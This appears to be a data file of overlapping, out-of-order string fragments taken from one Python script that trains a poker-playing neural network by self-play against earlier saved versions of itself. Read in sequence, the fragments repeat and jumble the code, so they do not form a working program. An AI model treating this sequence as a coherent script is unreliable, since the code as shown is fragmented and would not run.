"what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] <",
"player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state =",
"print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per",
"rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0]",
"saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1]",
"= [] while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount",
"hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo",
"return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names =",
"if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\",",
"pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models =",
"of first fold:\", hand_saldo) # randomize new action and continue playing... [action, action_ind],",
"\"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states,",
"st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time",
"m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id",
"def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions =",
"append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act",
"state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\",",
"opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names",
"= 4000 what_if_play = True do_training = True training_epochs = 30 # Leveling",
"2)) for st in states: all_states.append(st) for act in actions: all_actions.append(act) for winn",
"to fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0",
"= training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time()",
"model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings = []",
"left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for",
"= [] all_actions = [] all_winnings = [] total_saldo = [0, 0] for",
"\"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training",
"gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds =",
"print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo =",
"all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings)",
"20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = []",
"if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs",
"= [] all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\": if",
"gym.startHand() all_states = [] all_actions = [] all_winnings = [] hand_saldo = []",
"hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level:",
"= 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) ==",
"= gym.startHand() all_states = [] all_actions = [] all_winnings = [] hand_saldo =",
"\", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play)",
"[action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case",
"is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount)",
"# real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1,",
"load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i in range(len(model_paths)): opp_model",
"new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True)",
"= len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play):",
"file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name,",
"saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states,",
"all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states",
"import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id",
"time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time",
"training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] <",
"+ str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name)",
"\"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\"",
"in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else:",
"0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands",
"\", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\")",
"= [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned",
"= load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5",
"validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\",",
"= \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name, file=f) f.flush() f.close()",
"saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i",
"model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\",",
"= m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models,",
"state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return",
"load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play = True do_training =",
"= [] actions = [] winnings = [] #saldos = [] go_to_next_level =",
"= state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of",
"[action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1,",
"action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state,",
"time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play)",
"all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states =",
"actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands",
"In case of fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and",
"0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount =",
"load_gym import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings):",
"saldo at the moment of first fold:\", hand_saldo) # randomize new action and",
"= load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play = True do_training",
"saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2)",
"as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings)",
"0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states,",
"states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands,",
"False # In case of fold we can continue playing... if (action ==",
"all_winnings = [] total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand:",
"== 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f",
"rnd_odds): models = [] opp_names = [] for i in range(len(model_paths)): opp_model =",
"print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 #",
"epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\",",
"all_actions = [] all_winnings = [] total_saldo = [0, 0] for i in",
"+= 1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if",
"can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to",
"saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1),",
"= 50000 num_hands = 4000 what_if_play = True do_training = True training_epochs =",
"\"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush()",
"num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \",",
"total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return",
"hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states, all_actions,",
"num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if",
"what_if_play = True do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl",
"False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms",
"opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model,",
"actions = [] winnings = [] #saldos = [] go_to_next_level = True #",
"1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models)",
"rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per",
"hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i + 1),",
"total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i in",
"saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000",
"append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] =",
"file=f) f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds,",
"rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions = [] all_winnings =",
"print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo",
"winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo)",
"next_level += 1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name)",
"start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j],",
"= m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of fold we",
"total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i",
"models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym",
"play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions",
"all_states = [] all_actions = [] all_winnings = [] hand_saldo = [] while",
"Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models:",
"[] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] ==",
"hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \"",
"\"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0])",
"opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name",
"open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name =",
"opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) #",
"actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0]",
"range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i])",
"i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym,",
"# randomize new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call,",
"= play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1]",
"state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo)",
"4000 what_if_play = True do_training = True training_epochs = 30 # Leveling params",
"states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs,",
"opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return",
"num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\",",
"all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states",
"\" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds):",
"rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings =",
"opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model",
"= state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo =",
"= m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)):",
"-hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo) # randomize new",
"[0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings,",
"0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\")",
"ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if",
"import load_gym import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings,",
"\"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to opponent",
"play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = []",
"if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue",
"i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0]",
"= 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0,",
"2), \",\", round(total_saldo[1] / (i + 1), 2)) for st in states: all_states.append(st)",
"= time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs,",
"= [] go_to_next_level = True # Play against opp models for j in",
"[state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand",
"opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last one left",
"data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models",
"200 next_level = 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i,",
"never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action,",
"*= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time",
"#saldos = [] go_to_next_level = True # Play against opp models for j",
"opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play = True",
"f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name, file=f)",
"ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind)",
"where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\",",
"+ 1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for st in",
"saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1,",
"print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\",",
"load_gym import load_gym import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states,",
"\"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else:",
"def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i in range(len(model_paths)):",
"winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo",
"training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100,",
"we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted",
"i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\")",
"in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo",
"all_states = [] all_actions = [] all_winnings = [] total_saldo = [0, 0]",
"len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1,",
"Play against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush()",
"batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time),",
"def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = []",
"max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last one",
"total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states,",
"hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo) #",
"True # Play against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j],",
"state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state,",
"fold:\", hand_saldo) # randomize new action and continue playing... [action, action_ind], ammount =",
"[] all_actions = [] all_winnings = [] total_saldo = [0, 0] for i",
"= [] opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i])",
"0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000",
"rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions = []",
"f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j],",
"f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): #",
"saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() -",
"m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action =",
"action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act ==",
"print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] /",
"real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f)",
"m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds,",
"winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\",",
"state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated",
"/ num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush()",
"= gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) ==",
"dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id =",
"new training model. Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name)",
"and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action =",
"1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs",
"= time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() -",
"/ (i + 1), 2)) for st in states: all_states.append(st) for act in",
"[] all_winnings = [] total_saldo = [0, 0] for i in range(num_hands): print(\"\")",
"model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings",
"/ (i + 1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for",
"0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo",
"\"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\",",
"for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands",
"to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0)",
"== 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\",",
"range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions = [] winnings",
"per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i +",
"opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time =",
"for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs",
"< saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 *",
"for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions",
"while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym,",
"all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size",
"all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings,",
"= False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands),",
"state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo)",
"file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to",
"== ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\")",
"[] all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act",
"if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size",
"\"wanted to fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act] =",
"play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg",
"if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action,",
"#if (saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j],",
"\"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters",
"#saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time),",
"time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2),",
"f.flush() states = [] actions = [] winnings = [] #saldos = []",
"m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"],",
"len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where",
"rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play =",
"True do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200",
"= 200 next_level = 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\",",
"file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name, file=f) f.flush()",
"hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands,",
"= True # Play against opp models for j in range(len(opp_models)): print(\"Playing vs\",",
"range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time",
"[0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at",
"else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In",
